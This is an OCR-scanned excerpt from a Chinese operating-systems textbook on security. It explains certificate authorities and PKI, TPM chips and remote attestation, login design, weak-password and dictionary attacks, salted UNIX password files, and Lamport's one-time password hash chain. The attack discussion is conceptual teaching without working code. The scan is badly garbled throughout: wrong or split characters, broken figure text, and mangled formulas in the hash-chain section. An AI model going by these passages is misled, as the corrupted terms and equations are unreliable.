可 信任 的 第 三 方 数字 签名 。 一 旦 用 户 获 得 了 可 信 的 第 三 方 认证 的 公 钥 ， 那 么 对 于 所 有 使 用 这 种 可 信 第 三 
方 确认 来 生成 自己 证 书 的 发 送 方 ， 该 用 户 都 可 以 使 用 他 们 的 证 书 。 

认证 机 构 (Certification Authority, CA) 作为 可 信 的 第 三 方 ， 提 供 签名 证 书 。 然 而 如 果 用 户 要 验证 
有 CA 签名 的 证 书 ， 就 必须 得 到 CA 的 公 钥 ， 从 哪里 得 到 这 个 公 钥 ? 即使 得 到 了 用 户 又 如 何 确定 这 的 确 是 
CA 的 公 钥 呢 ? 为 了 解决 上 述 两 个 问题 ， 需 要 一 套 完整 的 机 制 来 管理 公 钥 ， 这 套 机 制 叫 作 PKI (Public 
Key Infrastructure， 公 钼 基础 设施 ) 。 网 络 浏览 器 已 经 通过 一 种 特别 的 方式 解决 了 这 个 问题 : 所 有 的 浏览 
器 都 预 加 载 了 大 约 40 个 著名 CA 的 公 钥 。 

上 面 我 们 叙述 了 可 用 于 数字 证 书 的 公 钥 密码 体制 。 同 时 ， 我 们 也 有 必要 指出 不 包含 公 钥 体制 的 密码 
体系 同样 存在 。 


9.5.5 可 信 平 台 模块 

加 密 算法 都 需要 密 钥 (key)。 如 果 密 钥 泄 露 了 ， 所 有 基于 该 密 钥 的 信息 也 等 同 于 泄露 了 ， 可 见 选择 
一 种 安全 的 方法 存储 密 钥 是 必要 的 。 接 下 来 的 问题 是 ， 如 何在 不 安全 的 系统 中 安全 地 保存 密 钥 呢 ? 

有 一 种 方法 在 工业 上 已 经 被 采用 ， 该 方法 需要 用 到 一 种 叫 作 可 信和 平台 模块 (Trusted Platform 
Modules, TPM) 的 芯片 。TPM 是 一 种 加 密 处 理 器 (cryptoprocessor)， 使 用 内 部 的 非 易 失 性 存储 介质 来 
保存 密 钥 。 该 芯片 用 硬件 实现 数据 的 加 密 / 解 密 操作 ， 其 效果 与 在 内 存 中 对 明文 块 进行 加 密 或 对 密 文 块 
进行 解密 的 效果 相同 ，TPM 同 时 还 可 以 验证 数字 签名 。 由 于 其 所 有 的 操作 都 是 通过 硬件 实现 ， 因 此 速度 
比 用 软件 实现 快 许多 ， 也 更 可 能 被 广泛 地 应 用 。 一 些 计算 机 已 经 安装 了 TPM 芯 片 ， 预 期 更 多 的 计算 机 会 
在 未 来 安装 。 

TPM 的 出 现 引发 了 很 多 争议 ， 因 为 不 同 厂 商 、 机 构 对 于 谁 来 控制 TPM 和 它 用 来 保护 什么 有 分 歧 。 
微软 大 力 提倡 采用 TPM 世 片 ， 并 且 为 此 开发 了 一 系列 应 用 于 TPM 的 技术 ， 包 括 Palladium、NGSCB 以 及 
BitLocker。 微 软 的 观点 是 ， 由 操作 系统 控制 TPM 芯 片 ， 并 使 用 该 芯片 阻止 非 授权 软件 的 运行 。" 非 授权 
软件 ”可 以 是 盗版 (非法 复制 ) 软件 或 仅仅 是 没有 经 过 操作 系统 认证 的 软件 。 如 果 将 TPM 应 用 到 系统 启 
动 的 过 程 中 ， 则 计算 机 只 能 启动 经 过 内 置 于 TPM 的 密 钥 签名 的 操作 系统 ， 该 密 钥 由 TPM 生 产 商 提供 ， 该 
密 钥 只 会 透露 给 允许 被 安装 在 该 计算 机 上 的 操作 系统 的 生产 商 ( 如 微软 )。 因 此 ， 使 用 TPM 可 以 限制 用 
户 对 软件 的 选择 ， 用 户 或 许 只 能 选择 经 过 计算 机 生产 商 授 权 的 软件 。 

由 于 TPM 可 以 用 于 防止 音乐 与 电影 的 盗版 ， 这 些 媒 体 生产 商 对 该 芯片 表现 出 了 浓厚 的 兴趣 。TPM 
同样 开启 了 新 的 商业 模式 ， 如 “租借 ”歌曲 与 电影 。TPM 通 过 检查 日 期 判断 当前 媒体 是 否 已 经 “过 期 ”， 
如 果 过 期 ， 则 拒绝 为 该 媒体 解码 。 

一 种 有 趣 的 TPM 使 用 方式 是 远程 认证 。 远 程 认 证 允许 外 部 第 三 方 使 用 TPM 进 行 计 算 机 认证 ， 并 执 
行 其 应 该 执行 的 软件 ， 整 个 过 程 全 部 可 人 和信。 这 个 想法 是 证 明 方 使 用 TPM 创 建 名 为 measurements 的 保护 配 
置信 息 的 哈 希 表 。 例 如 ， 外 部 第 三 方 除了 BIOS 之 外 ， 不 信任 我 方 机 器 上 的 任何 东西 ， 如 果 (外 部 ) 挑 
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开端 。 如 果 可 以 再 证 明 我 们 在 可 信赖 的 引导 程序 上 运行 了 合法 的 内 核 程 序 ， 甚 至 如 果 最 终 能 够 表明 我 们 
在 内 核 中 运行 了 正确 版 本 的 合法 应 用 ， 那 么 挑战 方 可 能 会 对 我 们 有 较 高 的 信任 度 。 首 先 思考 一 下 ， 在 引 
导 程 序 开始 之 后 机 器 发 生 了 什么 。 当 BIOS (被 信任 的 ) 启动 时 ， 它 初始 化 了 TPM， 同 时 在 加 载 引 导 程 
序 后 ， 创 建 了 一 个 内 存 代码 的 哈 希 值 。TPM 在 专用 的 注册 表 中 记录 了 结果 ， 也 就 是 我 们 熟知 的 PCR 
(Platform Configuration Register) ，PCR 不 能 被 直接 重 写 ， 而 只 能 使 用 拓展 的 方式 进行 扩充 。 为 了 扩展 
PCR ，TPM 使 用 输入 值 与 PCR 中 已 有 值 的 组 合 ， 形 成 一 个 新 的 哈 希 值 ， 因 此 ， 如 果 我 们 的 引导 程序 开始 
执行 ， 那 么 它 将 在 已 经 加 载 的 内 核 中 创建 一 个 measurement， 同 时 为 引导 加 载 器 自身 扩展 PCR 。 直 观 地 
说 ， 我 们 可 以 认为 PCR 中 的 密码 哈 希 值 是 一 条 哈 希 链 ， 这 条 哈 希 链 把 内 核 绑 定 到 引导 加 载 器 上 。 现 在 ， 
内 核 可 以 创建 在 其 上 运行 的 应 用 的 measurement， 同 时 扩展 PCR 。 

现在 来 考虑 这 个 问题 : 当 外 部 方 想 要 验证 我 们 运行 正确 的 (可 信任 的 ) 软件 堆栈 而 不 是 一 些 任意 的 
其 他 代码 时 会 发 生 什 么 。 首 先 ， 挑 战 方 创 建 了 一 个 不 可 预测 的 值 ， 例 如 一 个 160bit 的 值 ， 这 个 值 是 一 个 
临时 验证 码 ， 同 时 也 是 本 次 请 求 的 唯一 验证 值 ， 它 能 够 阻止 攻击 者 记录 远程 认证 请 求 的 回复 。 攻 击 方 会 
改变 配置 中 的 认证 方 ， 然 后 简单 地 重 发 之 前 的 所 有 后 续 认 证 请 求 。 通 过 校对 临时 协议 中 的 临时 验证 码 ， 
可 使 这 样 的 攻击 方法 无 法 奏效 。 当 认证 方 接收 到 带 有 随机 数 的 认证 请 求 时 ， 它 使 用 TMP 为 临时 验证 码 和 
PCR 值 创建 签名 ， 并 将 签名 同 临时 验证 码 、PCR 值 、 引 导 加 载 器 哈 希 值 、 内 核 哈 希 值 和 应 用 哈 希 值 一 并 
发 回 。 挑 战 方 首先 检查 签名 和 临时 验证 码 ， 然 后 会 使 用 自身 数据 中 可 信 的 引导 加 载 器 、 内 核 、 应 用 的 哈 
希 值 来 验证 返回 信息 中 的 对 应 的 三 个 哈 希 值 ， 如 果 返 回信 息 中 的 三 个 哈 希 值 并 不 存在 ， 则 验证 失败 ， 否 
则 ， 挑 战 方 会 重新 创建 三 个 组 件 结 合 的 哈 希 值 并 与 验证 方 发 送 的 PCR 值 进行 比较 ， 如 果 匹 配 成 功 ， 则 挑 
战 方 会 确信 验证 方 执行 了 这 三 个 组 件 。 签 名 结果 使 得 攻击 者 无 法 对 结果 进行 伪造 ， 因 为 我 们 知道 被 信任 
的 引导 加 载 器 上 正确 地 执行 着 内 核 和 程序 。 其 他 任何 代码 都 不 会 产生 相同 的 哈 希 链 。 

TPM 还 有 非常 广泛 的 应 用 领域 ， 而 这 些 领域 都 是 我 们 还 未 涉足 的 。 有 趣 的 是 ，TPM 并 不 能 提高 计 
算 机 在 应 对 外 部 攻击 中 的 安全 性 。 事 实 上 ，TPM 关 注 的 重点 是 采用 加 密 技术 来 阻止 用 户 做 任何 未 经 TPM 
控制 者 直接 或 间接 授权 的 事情 。 如 果 读 者 想 了 解 更 多 关于 TPM 的 内 容 ， 在 Wikipedia 中 关于 可 信 计 算 
(trusted computing) 的 文献 可 能 会 对 你 有 所 帮助 。 

9.6 认证 

每 一 个 安全 的 计算 机 系统 一 定 会 要 求 所 有 的 用 户 在 登录 的 时 候 进 行 身份 认证 。 如 果 操 作 系统 无 法 确 
定 当前 使 用 该 系统 的 用 户 的 身份 ， 则 系统 无 法 决定 哪些 文件 和 资源 是 该 用 户 可 以 访问 的 。 表 面 上 看 认证 
似乎 是 一 个 微不足道 的 话题 ， 但 它 远 比 大 多 数 人 想象 的 要 复杂 。 

用 户 认 证 是 我 们 在 1.5.7 部 分 所 阐述 的 “个 体重 复 系统 发 育 ” 事 件 之 一 。 早 期 的 主机 ， 如 ENIAC 并 
没有 操作 系统 ， 更 不 用 说 去 登录 了 。 后 续 的 批 处 理 和 分 时 系统 通常 有 为 用 户 和 作业 的 认证 提供 登录 服务 
的 机 制 。 

早期 的 小 型 计算 机 (如 PDP-1 和 PDP-8) 没有 登录 过 程 ， 但 是 随 着 UNIX 操 作 系统 在 PDP-11 小 型 计 
算 机 上 的 广泛 使 用 ， 又 开始 使 用 登录 过 程 。 早 先 的 个 人 计算 机 (如 Apple II 和 最 初 的 BM PC) 没有 登录 
过 程 ， 但 是 更 复杂 的 个 人 计算 机 操作 系统 ， 如 Linux 和 Windows Vista 需 要 安全 登录 (然而 有 些 用 户 却 将 
登录 过 程 去 除 ) 。 公 司 局 域 网 内 的 机 器 设置 了 不 能 被 跳 过 的 登录 过 程 。 今 天 很 多 人 都 直接 登录 到 远程 计 
算 机 上 ， 享 受 网 银 服务 、 网 上 购物 、 下 载 音 乐 ， 或 进行 其 他 商业 活动 。 所 有 这 些 都 要 求 以 登录 作为 认证 
身份 的 手段 ， 因 此 认证 再 一 次 成 为 与 安全 相关 的 重要 话题 。 

决定 如 何 认证 是 十 分 重要 的 ， 接 下 来 的 一 步 是 找到 一 种 好 方法 来 实现 它 。 当 人 们 试图 登录 系统 时 ， 
大 多 数 用 户 登录 的 方法 基于 下 列 三 个 方面 考虑 : 

1) 用 户 已 知 的 信息 。 

2) 用 户 已 有 的 信息 。 

3) 用 户 是 谁 。 

有 些 时 候 为 了 达到 更 高 的 安全 性 , 需要 同时 满足 上 面 的 两 个 方面 。 这 些 方面 导致 了 不 同 的 认证 方案 ， 
它们 具有 不 同 的 复杂 性 和 安全 性 。 我 们 将 依次 论述 。 
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最 广泛 使 用 的 认证 方式 是 要 求 用 户 输入 登录 名 和 密码 。 密 码 保护 很 容易 理解 ， 也 很 容易 实施 。 最 简 
单 的 实现 方法 是 保存 一 张 包含 登录 名 和 密码 的 列表 。 登 录 时 ， 通 过 查找 登录 名 ， 得 到 相应 的 密码 并 与 输 
入 的 密码 进行 比较 。 如 果 匹 配 ， 则 允许 登录 ， 如 果 不 匹配 ， 登 录 被 拒绝 。 

毫 无 疑问 ， 在 输入 密码 时 ， 计 算 机 不 能 显示 被 输入 的 字符 以 防 在 终端 周围 的 好 事 之 徒 看 到 。 在 
Windows 系 统 中 ， 将 每 一 个 输入 的 密码 字符 显示 成 星 号 。 在 UNIX 系 统 中 ， 密 码 被 输入 时 没有 任何 显示 。 
这 两 种 认证 方法 是 不 同 的 。Windows 也 许 会 让 健忘 的 人 在 输入 密码 时 看 看 输 进 了 几 个 字符 ， 但 也 把 密码 
长 度 泄露 给 了 “ 偷 听 者 ”"。( 因 为 某 种 原因 ， 英 语 有 一 个 词汇 专门 表示 偷 听 的 意思 ， 而 不 是 表示 偷 帘 ， 这 
里 不 是 跑 咕 的 意思 ， 这 个 词 在 这 里 不 适用 。) 从 安全 角度 来 说 ， 沉 默 是 金 。 

另 一 个 设计 不 当 的 方面 出 现 了 严重 的 安全 问题 ， 如 图 9-17 所 示 。 在 图 9-17a 中 显示 了 一 个 成 功 的 登 
录 信 息 ， 用 户 输入 的 是 小 写字 母 ， 系 统 输出 的 是 大 写字 母 。 在 图 9-17b 中 ， 显 示 了 驴 客 试图 登录 到 系统 A 
中 的 失败 信息 。 在 图 9-17c 中 ， 显 示 了 骇 客 试图 登录 到 系统 B 中 的 失败 信息 。 


LOGIN: carol 


LOGIN: mitch LOGIN: carol PASSWORD: Idunno 
PASSWORD: FooBarl-7 INVALID LOGIN NAME INVALID LOGIN 
SUCCESSFUL LOGIN LOGIN: LOGIN: 

a) b) c) 


图 9-17 a) 一 个 成 功 的 登录 ，b) 输入 登录 名 后 被 拒绝 ，c) 输入 登录 名 和 密码 后 被 拒绝 


在 图 9-17b 中 ， 系 统 只 要 看 到 非法 的 登录 名 就 禁止 登录 。 这 样 做 是 一 个 错误 ， 因 为 系统 让 骇 客 有 机 
会 尝试 ， 直 到 找到 合法 的 登录 名 。 在 图 9-17c 中 ， 无 论 骇 客 输入 的 是 合法 还 是 非法 的 登录 名 ， 系 统 都 要 
求 输入 密码 并 没有 给 出 任何 反馈 。 骇 客 所 得 到 的 信息 只 是 登录 名 和 密码 的 组 合 是 错误 的 。 

大 多 数 笔记 本 电脑 在 用 户 登录 的 时 候 要 求 一 个 用 户 名 和 密码 来 保护 数据 ， 以 防止 笔记 本 电脑 失窃 。 
然而 这 种 保护 在 有 些 时 候 却 收效 其 微 ， 任 何 拿 到 笔记 本 的 人 都 可 以 在 计算 机 启动 后 迅速 证 击 DEL、F8 或 
相关 按键 ， 并 在 受 保护 的 操作 系统 启动 前 进入 BIOS 配 置 程序 ， 在 这 里 计算 机 的 启动 顺序 可 以 被 改变 ， 
使 得 通过 USB 端 口 启动 的 检测 先 于 对 从 硬盘 启动 的 检测 。 计 算 机 持 有 者 此 时 插入 安装 有 完整 操作 系统 的 
USB 设 备 ， 计 算 机 便 会 从 USB 中 的 操作 系统 启动 ， 而 不 是 本 机 硬盘 上 的 操作 系统 启动 。 计 算 机 一 旦 启动 
起 来 ， 其 原 有 的 硬盘 则 被 挂 起 (在 UNIX 操 作 系 统 中 ) 或 被 映射 为 D 盘 驱动 器 (在 Windows 中 )。 因 此 ， 
绝 大 多 数 BIOS 都 允许 用 户 设置 密码 以 控制 对 BIOS 配 置 程序 的 修改 ， 在 密码 的 保护 下 ， 只 有 计算 机 的 真 
正 拥有 者 才 可 以 修改 计算 机 启动 顺序 。 如 果 读 者 拥有 一 台 笔 记 本 电脑 ， 那 么 请 先 放 下 本 书 ， 先 为 BIOS 
设置 一 个 密码 。 

1. 弱 密 码 

大 多 数 骇 客 通过 简单 的 暴力 破解 登录 名 和 密码 的 方法 攻 人 系统。 许多 人 使 用 自己 的 名 字 或 名 字 的 某 
种 形式 作为 登录 名 。 如 对 Ellen Ann Smith 来 说 ，ellen、smith、ellen_smith 、ellen-smith ellen.smith, 
esmith 、easmith 等 都 可 能 成 为 备 选 登录 名 。 黑 客 赁 借 一 本 叫 作 《4096 Names for Your New Baby) 
(《4096 个 为 婴儿 准备 的 名 字 》) 的 书 外 加 一 本 含有 大 量 名 字 的 电话 本 ， 就 可 以 对 打算 攻击 的 国家 计算 机 
系统 编辑 出 一 长 串 潜 在 的 登录 名 (如 ellen_smith 可 能 是 在 美国 或 英国 工作 的 人 ,但 在 日 本 却 行 不 通 )。 

当然 ， 仅 仅 猜 出 登录 名 是 不 够 的 。 骇 客 还 需要 猜 出 登录 名 的 密码 。 这 有 多 难 呢 ? 简单 得 超过 你 的 想 
象 。 最 经 典 的 例子 是 Morris 和 Thompson (1979) 在 UNIX 系 统 上 所 做 的 安全 密码 尝试 。 他 们 编辑 了 一 长 
串 可 能 的 密码 : 名 和 姓氏 、 路 名 、 城 市 名 、 字 典 里 中 等 长 度 的 单词 (也 包括 倒 过 来 拼写 的 ) 、 许 可 证 号 
码 和 许多 随机 组 成 的 字符 串 。 然 后 他 们 把 这 一 名 单 同系 统 中 的 密码 文件 进行 比较 ， 看 看 有 多 少 被 猜 中 的 
密码 。 结 果 有 86%% 的 密码 出 现在 他 们 的 名 单 里 。Klein (1990) 也 得 到 过 同样 类 似 的 结果 。 

也 许 有 人 认为 高 质量 的 用 户 会 设置 高 质量 的 密码 ， 事 实 与 大 家 的 想象 并 不 一 致 。2012 年 ，640 万 条 
LinkedIn 用 户 密码 〈 哈 希 后 ) 在 一 次 攻击 后 被 泄露 到 网 络 上 ， 有 人 对 这 份 文件 进行 了 分 析 ， 并 得 到 了 非 
常 有 趣 的 结果 。 最 常用 的 密码 是 “password”， 次 之 是 “123456”(“1234” “12345” “12345678” 位 列 前 
十 )。 事 实 上 ， 黑 客 不 费 吹 灰 之 力 就 可 以 编辑 出 一 系列 潜在 的 登录 名 和 密码 ， 然 后 在 电脑 上 跑 一 个 程序 ， 
使 用 这 些 潜在 的 候选 登录 名 和 密码 去 尽 可 能 多 地 破解 用 户 的 电脑 。 
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这 与 2013 年 3 月 IOActive 的 研究 人 员 所 做 的 工作 类 似 。 他 们 扫描 《了 一 大 批 家 庭 路 由 器 和 机 顶 盒 ， 看 
看 他 们 是 否 容易 受到 最 简单 的 攻击 。 他 们 只 是 尝试 众所周知 的 设备 商 默认 的 账号 和 密码 。 用 户 应 当 立 即 
修改 默认 的 账号 和 密码 ， 但 是 他 们 没有 。 研 究 人 员 发 现 ， 成 千 上 万 的 设备 存 有 潜在 的 被 攻击 的 风险 ,更 
可 怕 的 是 ， 西 门 子 控制 离心 机 的 计算 机 的 默认 密码 已 经 在 互联 网 上 传播 了 多 年 ， 但 是 仍 被 使 用 ，Stuxnet 
亦 利 用 了 cixinxi 来 攻击 伊朗 的 核 设 施 。 

网 络 的 普及 使 得 这 一 情况 更 加 恶化 。 很 多 用 户 并 不 只 拥有 一 个 密码 ， 然 而 由 于 记 住 多 个 元 长 的 密码 
是 一 件 困难 的 事情 ， 因 此 大 多 数 用 户 都 趋向 于 选择 简单 且 强 度 很 弱 的 密码 ， 并 且 在 多 个 网 站 中 重复 使 用 
他 们 (Florencio 和 Herley，2007; Gaw 和 Felten, 2006 ) 。 

如 果 密 码 很 容易 被 猜 出 ， 真 的 会 有 什么 影响 吗 ? 当然 有 。1998 年 , 《圣何塞 信使 新 闻 》 报 告 说 , 一 
位 在 Berkeley 的 居民 Peter Shipley， 组 装 了 好 几 台 未 被 使 用 的 计算 机 作为 军用 拨号 器 (war dialer), it] 
了 某 一 个 分 局 内 的 10 000 个 电话 号 码 (如 (415) 770-xxxx)。 这 些 号 码 是 被 随机 拨 出 的 ， 以 防 电话 公司 
禁用 措施 和 跟踪 检测 。 在 拨打 了 大 约 260 万 个 电话 后 ， 他 定位 了 旧金山 湾 区 的 20 000 台 计算 机 ， 其 中 约 
200 台 没有 任何 安全 防范 。 他 估计 一 个 别有用心 的 骇 客 可 以 破译 其 他 75% 的 计算 机 系统 (Denning, 1999), 
这 就 回 到 了 侏 罗 纪 时 代 ， 计 算 机 实际 只 需 拨打 所 有 260 万 个 电话 号 码 旨 。 

并 不 只 有 加 利 福 尼 亚 州 才 有 这 样 的 骇 客 ， 一 个 澳大利亚 骇 客 曾 经 做 过 同样 的 尝试 。 在 这 个 骇 客 问 入 
的 系统 中 有 在 沙特 阿拉 伯 的 花旗 银行 的 计算 机 ， 使 他 能 够 获得 信用 卡号 码 、 信 用 额度 (如 500 万 美元 ) 
和 交易 记录 。 他 的 一 个 同伴 也 曾 问 入 过 银行 计算 机 系统 ， 盗 取 了 4000 个 信用 卡号 (Denning，1999)。 如 
果 滥 用 这 样 的 信息 ， 银 行 毫 无 疑问 会 极力 否认 自己 有 错 ， 而 声称 一 定 是 客户 泄露 了 信息 。 

互联 网 是 上 帝 赐 给 骇 客 的 最 好 的 礼物 ， 它 帮助 骇 客 扫 清 了 入 侵 计算 机 过 程 中 的 绝 大 多 数 麻烦 ， 不 需要 
拨打 更 多 的 电话 号 码 ，( 也 不 再 需要 听 等 待 电话 接 通 的 嘟 哪 声 了 ) ， 军 用 拨号 器 可 以 按 下 面 的 方式 工作 。 
骇 客 可 以 将 脚本 ping (发 送 网 络 数据 包 ) 写 入 一 组 卫 地 址 。 如 果 它 接收 到 任何 响应 ， 那 么 脚本 随后 将 尝 
试 为 在 机 器 上 运行 的 所 有 可 能 的 服务 设置 TCP 连 接 。 如 前 所 述 ， 利 用 端口 扫描 来 映射 计算 机 与 其 运行 的 
服务 器 ， 而 不 是 从 头 开始 编写 脚本 ， 骇 客 也 可 以 使 用 专门 工具 (如 nmap) 提供 的 各 种 高 级 的 端口 扫描 技 
术 。 现 在 攻击 者 知道 在 哪 台 机 器 上 运行 哪些 服务 器 ， 下 一 步 是 启动 攻击 。 例 如 ， 如 果 攻 击 者 想 要 检测 密 
码 保护 ， 他 将 连接 到 使 用 这 种 身份 验证 方法 的 服务 ， 例 如 telnet 服 务 器 ， 甚 至 是 Web 服 务 器 。 我 们 已 经 看 
到 ， 默 认 密 码 或 其 他 弱 密 码 使 得 攻击 者 能 够 收集 大 量 账户 信息 ， 有 时 还 具有 完全 的 管理 员 权 限 。 

2. UNIX 密 码 安 全 性 

有 些 (老式 的 ) 操作 系统 将 密码 文件 以 未 加 密 的 形式 存放 在 磁盘 里 ， 由 一 般 的 系统 保护 机 制 进行 保 
护 。 这 样 做 等 于 是 自 找 麻烦 ， 因 为 许多 人 都 可 以 访问 该 文件 。 系 统管 理 员 、 操 作 员 、 维 护 人 员 、 程 序 员 、 
管理 人 员 甚 至 有 些 秘书 都 可 以 轻而易举 得 到 。 

在 UNIX 系 统 里 有 一 个 较 好 的 做 法 。 当 用 户 登 录 时 ， 登 录 程序 首先 询问 登录 名 和 密码 。 输 入 的 密码 
被 即刻 “加 密 "， 这 是 通过 将 其 作为 密 钥 对 某 段 数据 加 密 完成 的 : 运行 一 个 有 效 的 单 向 函数 ， 运 行 时 将 
密码 作为 输入 ， 运 行 结果 作为 输出 。 这 一 过 程 并 不 是 真 的 加 密 ， 但 人 们 很 容易 把 它 叫 作 加密 。 然 后 登录 
程序 读 入 加 密 文 件 ， 也 就 是 一 系列 ASCII 代 码 行 ， 每 个 登录 用 户 一 行 ， 直 到 找 出 包含 登录 名 的 那 一 行 。 
如 果 这 行内 (被 加 密 后 的 ) 的 密码 与 刚刚 计算 出 来 的 输入 密码 匹配 ， 就 允许 登录 ， 否 则 就 拒绝 。 这 种 方 
法 的 最 大 好 处 是 任何 人 (甚至 是 超级 用 户 ) 都 无 法 查看 任何 用 户 的 密码 ， 因 为 密码 文件 并 不 是 以 未 加 密 
方式 在 系统 中 任意 存放 的 。 从 阐述 的 角度 上 来 看 ， 操 作 系统 的 密码 被 保存 在 密码 文件 中 。 稍 后 我 们 将 看 
到 ，UNIX 的 现代 版 本 已 经 不 再 使 用 这 种 方式 。 

然而 ， 如 果 骇 客 获 得 加 密 的 密码 ， 那 么 这 种 方法 便 可 能 会 遭 到 攻击 。 骇 客 可 以 首先 像 Morris 和 


O 在 获得 奥斯卡 奖 的 科幻 电影 《 侏 罗 纪 公 园 I》 中 ， 一 位 名 叫 Dennis Nedry 的 计算 机 系统 总 设计 师 暗地里 将 由 
计算 机 控制 的 保安 系统 全 部 关闭 并 逃离 了 主 控 室 ， 以 便 窃取 并 带 走 恐龙 的 DNA。 另 一 位 计算 机 技术 人 员 面 
对 混乱 的 系统 ， 对 现场 的 其 他 人 说 ， 由 于 没有 保存 任何 信息 ， 所 以 要 想 恢复 保安 系统 ， 只 有 一 个 一 个 地 测 
试 ， 才 能 在 总 共 200 万 个 号 码 中 将 需要 的 号 码 找 出 来 ， 一 听 是 200 万 个 号 码 ， 在 场 的 人 都 泄 了 气 。 作 者 在 这 
里 调侃 了 电影 《 侏 罗 纪 公园 I》 的 创作 者 们 ， 既 然 现 场 计算 机 系统 还 能 工作 ， 为 什么 不 让 计算 机 去 拨打 这 些 
号 码 呢 ! ? 译 者 注 
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”Thompson 一 样 建立 备 选 密码 的 字典 并 在 空 暇 时 间 用 已 知 算法 加 密 。 这 一 过 程 无 论 有 多 长 都 无 所 谓 ， 因 
为 它们 是 在 进入 系统 前 事先 完成 的 。 现 在 有 了 密码 对 (原始 密码 和 经 过 了 加 密 的 密码 ) 就 可 以 展开 攻击 
了 。 骇 客 读 入 密码 文件 (可 公开 获取 )， 抽 取 所 有 加 密 过 的 密码 ， 然 后 将 其 与 密码 字典 里 的 字符 串 进行 
比较 。 每 成 功 一 次 就 获取 了 登录 名 和 未 加 密 过 的 密码 。 一 个 简单 的 shell 脚 本 可 以 自动 运行 上 述 操作 ， 这 
样 整个 过 程 可 以 在 不 到 一 秒 的 时 间 内 完成 。 这 样 的 脚本 一 次 运行 会 产生 数 十 个 密码 。 

Morris 和 Thompson 意 识 到 存在 这 种 攻击 的 可 能 性 ， 于 是 便 引 入 了 一 种 几乎 使 攻击 上 毫 无 效果 的 技巧 。 
这 一 技巧 是 将 每 一 个 密码 同一 个 叫 作 盐 (salt) 的 n 位 随机 数 相关 联 。 无 论 何 时 只 要 密码 改变 ， 随 机 数 就 
改变 。 随 机 数 以 未 加 密 的 方式 存放 在 密码 文件 中 ， 这 样 每 个 人 都 可 mae won ee 
以 读 。 不 再 只 保存 加 密 过 的 密码 ， 而 是 先 将 密码 和 随机 数 连接 起 来 Tony, 2918, 9(6%%TaeFF, 2918) 
然后 一 同 加 密 。 加 密 后 的 结果 存放 进 密 码 文件 。 如 图 9-18 所 示 ， 一 Laura, 6902, e(Shakespeare, 6902)| 
个 密码 文件 里 有 5 个 用 户 ; Bobbie、Tony、Laura、Mark 和 Deborah 。 Mark, 1694, e(XaB #Bwcz ,1694) 
每 一 个 用 户 在 文件 里 分 别 占 一行 ， 用 逗号 分 解 为 3 个 条 目 : 登录 名 、 Debora; 1092, e(LordByron,1992) 
盐 和 【密码 + 盐 ) 的 加 密 结果 。 符 号 e (Dog, 4238) 表示 将 Bobbie ”图 9-18 通过 “ 盐 ” 的 使 用 抵抗 对 
的 密码 Dog 同 他 的 随机 数 ，4238 通 过 加 密 函 数 e 运 算 后 的 结果 。 这 一 已 加 密 口 令 的 先期 运算 
加 密 值 放 在 Bobbie 条 目的 第 三 个 域 。 

现在 我 们 回顾 一 下 骇 客 非法 韶 和 计算 机 系统 的 整个 过 程 : 首先 建立 可 能 的 密码 字典 ， 把 它们 加 密 ， 
然后 存放 在 经 过 排序 的 文件 种 ， 这 样 任何 加 密 过 的 密码 都 能 够 被 轻易 找到 。 假 设 入 侵 者 怀疑 Dog 是 一 个 
可 能 的 密码 ， 把 Dog 加 密 后 放 进 文件 中 就 不 再 有 效 了 。 骇 客 不 得 不 加 密 2" 个 字符 串 ， 如 Dog0000、 
Dog0001、Dog0002 等 ， 并 在 文件 f 中 输入 所 有 知道 的 字符 串 。 这 种 方法 增加 了 2" 倍 的 太 的 计算 量 。 在 
UNIX 系 统 中 的 该 方法 里 n = 12, 

对 附加 的 安全 功能 来 说 ， 有 些 UNIX 的 现代 版 通常 将 加 密 密 码 存储 在 单独 的 “shadow” 文 件 中 ， 与 
密码 文件 不 同 ， 它 只 能 由 root 读 取 。 对 密码 文件 采用 “加 盐 ” 的 方法 以 及 使 之 不 可 读 (除非 间接 和 缓慢 
地 读 )， 可 以 抵挡 大 多 数 的 外 部 攻击 。 

3. 一 次 性 密码 

很 多 管理 员 劝 解 他 们 的 用 户 一 个 月 换 一 次 密码 。 但 用 户 常常 不 把 这 些 忠 告 放 在 心 上 。 更 换 密码 更 极 
端的 方式 是 每 次 登录 换 一 次 密码 ， 即 使 用 一 次 性 密码 。 当 用 户 使 用 一 次 性 密码 时 ， 他 们 会 拿 出 含有 密码 
列表 的 本 子 。 用 户 每 一 次 登录 都 需要 使 用 列表 里 的 后 一 个 密码 。 如 果 入 侵 者 万 一 发 现 了 密码 ， 对 他 也 没 
有 任何 好 处 ， 因 为 下 一 次 登录 就 要 使 用 新 的 密码 。 唯 一 的 建议 是 用 户 必须 避免 丢失 密码 本 。 

实际 上 ， 使 用 Leslie Lamport 巧 妙 设计 的 机 制 ， 就 不 再 需要 密码 本 了 ， 该 机 制 让 用 户 在 并 不 安全 的 网 
络 上 使 用 一 次 性 密码 安全 登录 (Lamport，1981) 。Lamport 的 方法 也 可 以 让 用 户 通 过 家 里 的 PC 登录 到 
Internet 服 务 器 ， 即 便 入 侵 者 可 以 看 到 并 且 复 制 下 所 有 进出 的 消息 。 而 且 ， 这 种 方法 无 论 在 服务 器 和 还 是 用 
户 PC 的 文件 系统 中 ， 都 不 需要 放置 任何 秘密 信息 。 这 种 方法 有 时 候 被 称 为 单 向 散 列 链 (one-way hash 
chain ) 。 

上 述 方法 的 算法 基于 单 向 函数 ， 即 y = f (x)。 给 定 x 我 们 很 容易 计算 出 y， 但 是 给 定 y 却 很 难 计算 出 x。 
输入 和 输入 必须 是 相同 的 长 度 ， 如 256 位 。 

用 户 选 取 一 个 他 可 以 记 住 的 保密 密码 。 该 用 户 还 要 选择 一 个 整数 上 ， 该 整数 确定 了 算法 所 能 够 生成 
的 一 次 性 密码 的 数量 。 如 果 ， 考 虑 n = 4， 当 然 实际 上 所 使 用 的 " 值 要 大 得 多 。 如 果 保 密 密 码 为 9*， 那 么 通 
过 单 向 函数 计算 ?次 得 到 的 密码 为 : 


























P =f FEFEFE) 
第 2 个 密码 用 单 向 函数 运算 "一 1 次 : 
P,=fF(F(s)) 
第 3 个 密码 对 f BRK, BARIK. BZ, Pii = f (Pi)。 要 注意 的 地 方 是 ， 给 定 任何 序列 里 的 密码 ， 
我 们 很 容易 计算 出 密码 序列 里 的 前 一 个 值 ， 但 却 不 可 能 计算 出 后 一 个 值 。 如 ， 给 定 P, 很 容易 计算 出 Pi， 
但 不 可 能 计算 出 P;。 
